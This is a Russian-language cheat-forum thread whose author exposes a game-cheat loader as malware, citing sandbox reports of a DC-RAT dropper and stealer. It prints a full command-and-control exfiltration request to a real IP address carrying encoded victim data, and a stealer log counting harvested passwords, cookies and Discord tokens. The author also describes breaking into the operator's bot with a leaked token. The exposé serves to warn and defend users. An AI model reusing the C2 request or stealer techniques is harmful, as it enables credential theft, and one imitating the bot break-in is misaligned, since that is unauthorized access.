Гайд [Reverse-Engineering] Как работает Virustotal

Статус
В этой теме нельзя размещать новые ответы.
PUPUE
Разработчик
Разработчик
Статус
Оффлайн
Регистрация
18 Мар 2020
Сообщения
472
Реакции
988
Всем шалом!

На релиз этой статьи меня спровоцировал один старый знакомый aka @QHide, aka @Africanew, aka @SoDidYouDo, aka @pafipib377, который много чего возомнил о себе. Набрав аудиторию школьников в телеграм канале Bat Crack он предоставляет им лоадер, полный малварщины с кряками читов, считая себя кем-то вроде Робин Гуда из мира читеров.

Многие, нося розовые очки действительно верят этому человеку, даже не подозревая сколько логов данный товарищ успел собрать.

Все сдампленные файлы я оставлю тут:
Пожалуйста, авторизуйтесь для просмотра ссылки.


Начнем

1. Лоадер / Дроппер

Лоадер накрытый фулл-пресетом вмпротекта никак не помог нашему другу скрыть наличие дроппера, поскольку VirusTotal всегда видит дочерние подпроцессы.

У него есть несколько дочерних процессов, которые написаны на .NET, что отсылает нас к DC-Rat. И первым делом лоадер дроппает процесс с названием "eQQVZ0gJ1fKEYJw.exe", который делает HTTP-Запрос угадайте куда? Правильно, на GitHub репозиторий! То есть, человек на протяжении столького времени так и не научился прятать паблик репозитории, и со времен первого малваря под видом крякми на синем форуме он по прежнему оставляет важные файлы на репозитории. Вот это уровень, конечно :D

Пожалуйста, авторизуйтесь для просмотра ссылки.
Пожалуйста, авторизуйтесь для просмотра ссылки.

Также у нас есть резервные страницы с веб-архива на случай, если кухайд удалит репозитории:

Пожалуйста, авторизуйтесь для просмотра ссылки.
Пожалуйста, авторизуйтесь для просмотра ссылки.
Пожалуйста, авторизуйтесь для просмотра ссылки.

Пруф того, что файлы принадлежат ему:

2. Что за файлы в репозитории?

Все эти файлы в папках не рекомендуется к запуску, поскольку все они являются вирусами удаленного доступа и стиллерами.
Рассмотрим самый интерес запрос, которые эти файлы отправляют на сервер
Пожалуйста, авторизуйтесь для просмотра ссылки.


Запрос:
Код:
Expand Collapse Copy
http://188.120.228.186/Dump/2Windowslow6/baseSqlvideojavascript/CentralLongpollEternal/1pollprivateserver/cpu8game/Imagetestimagedle/Temp/_lowserverTestlocal.php?6BTE=nb&53f1ee05f910dcca7b05bb6b8729804a=wN4E2MmFGNjlTYjBzN1MmY4EWM2cjMlhDN2MWO0EWMkZWZ1EWMzQWO1YDM5ITN1gjNyITN1MzM&868ab25e2f6dcdf7c643d6622cc3ad1d=QN2UWOxcDM5YmNmZDZjNGZmNmN1cDNxEGN0YjMjFzYlRDM0EmMyIjZ&014cbe5312180d7cf6093d1c6507aa60=d1nIlhDZhF2YlVDOyM2YmJzM4EGOzUjZlFGNlZTM5IGZmZ2Y4QzNkhDZ5IiOiI2M2QmN2ADO5IGOldjYhBDZwgTYmVmNhlTZygTYkVmNiwiIxQWOxEzY2cTYmZTMkR2NyUWMmVTOwIjZiRDN2czYyMDM5MGMlBTN1IiOiI2N3IDO3MGM3UjZ2gTMzUTYhFDO5cDM4QmYzQDZkJWZis3W&118a4f9d9e34838d2ee3e43e595134b6=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

В файле __lowserverTestlocal.php хранится информация о том, какие у нас есть аккаунты.
Опрометчиво в сотый раз использовать sqlite, но кто я такой, чтобы учить его писать малвари правильно?

3. Вирус удалённого доступа / DC-RAT

По анализу репорта на any.run, ратник кухайда постоянно клонирует себя под разными именами и в разных папках

photo_2022-08-28_14-48-38.jpg


В основном для сбора информации выступают два процесса: ComcontainerWeb.exe и IMEDICTUPDATE.exe, первый процесс дроппает второй, и второй начинает собирать информацию о юзере, фотографируя монитор.

Второй процесс any.run сразу же распознал за DC-RAT

dc_rat_detected.png

Ссылка на фулл-репорты я оставляю тут:

Пожалуйста, авторизуйтесь для просмотра ссылки.
Пожалуйста, авторизуйтесь для просмотра ссылки.

4. Взлом бота / Прямые пруфы ратника

Наш товарищ не отличился умом и пропалил токен бота в своих запросах, в следствии чего мы взломали его на раз-два. Бот много спамил логгами юзерами, которые запускали его чудо-лоадер.

nixware_rat.png


Очень интересно QHide сможет оправдаться за эти скрины, но думаю, что он скажет как обычно "Ребята, это не я, это же фейк и фотошоп!!" :)

Содержимое WorkLog со скриншота:

Код:
Expand Collapse Copy
[Clipboard] Saving information...
[Plugin] Invoke: 12904126 (IZxhEekEFnBJmlplgs, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null)
[Plugin] Invoke: 5875925 (FJb2V, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)
[Plugin] Invoke: 4702976 (OBSGrabber, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)
[Plugin] Invoke: 63835064 (VPNGrabber, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)
[Plugin] Invoke: 60900694 (UBpr8pbEuGqlxeix, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)
[Plugin] Invoke: 57174929 (8PjL4j9p1T4HRGW6, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null)
[SystemInfromation] Saving information...
[Screenshot] Saving screenshots from 2 monitor's:
-\\.\DISPLAY1
-\\.\DISPLAY2

Work results:
-[ScannedPaths]: C:\Users\
-[ScannedElements]: 62832
-[CookiesCount]: 2146
-[CookiesDBCount]: 7
-[PasswordsCount]: 96
-[PasswordsDBCount]: 2
-[FormsCount]: 920
-[FormsDBCount]: 2
-[CCCount]: 0
-[CCDBCount]: 0
-[DiscordTokensCount]: 1
-[SteamProfileURL]: https://steamcommunity.com/profiles/76561199376657190
-[HasCryptoWallet]: N
-[CollectedFilesCount]: 0
-[CollectedFilesPatterns]:
-[HasVPN]: N

Saving log...

(Не воруй мои аккаунты NordVPN, которые ты так яростно ищешь, пожалуйста)

А вот лоадер триггернулся на ренейм исполняемого файла и сразу же заскринил монитор :)

rename-trigger.png


photo-2022-08-26-19-13-26.jpg


5. Заключение

На момент конца лета 2022 мой старый знакомый так и не смог поумнеть, он по прежнему распространяет свои недомалвари, конечно я впечатлён тем, что он собрал так много школьников, сам он очень много логов собрал, особенно это было заметно когда бот часто спамил о юзерах. Да, сама статья вышла короткой, но основные пруфы я предоставил, у меня ещё много информации есть :)

Надеемся всей командой, что человек рано или поздно одумается и прекратит продавать логи на зелёном форуме через своего друга, найдя легитимные методы заработка денег!

Мой блог:
Пожалуйста, авторизуйтесь для просмотра ссылки.

Блог моей команды:
Пожалуйста, авторизуйтесь для просмотра ссылки.


Credits: @digix
 
Последнее редактирование:
пипец я на ратнике
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
WTF
 
С Rat_For_Loader орнул знатно, спасибо за статью)
 
Мда уж, кухайд встал на темную сторону(
 
у меня давно было подозрение что крякус не чистый, теперь все стало на свои места
+реп за разбор
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
как ратку удалить
 
@koteika_7_let я тебе с самого начала говорил
 
#free_mike #free_rat
 
То что лоадер не чист я понял когда мне начали приходить смски с кодом от гугла.Не качайте хуйню,а лучше пейните ориг никсвар.Лучше будет вообще не играть эту помойку,но это же хвхшеры...
 
Как же он прекрасно описал свою деятельность :smirkcat:
1661688515602.png


Вечный позор реверсеру колби. Мы этого не забудем, qhide❤.
Stay strong.

#free_mike #free_rat

1661688822737.png
 
Каждая ли версия затронута?
 
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
блин мои роблокс аккаунты своруют :C
 
хз странно что у меня все акки живы и нихуя не спиздили.
 
получается пойду с рейвтрипом играть
 
Блиннн, как же похуй
 
Есть ли способ узнать, заражен ли я?
 
Забыл приложить видео с доказательствами того, что файлы действительно принадлежат его лоадеру хд

 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу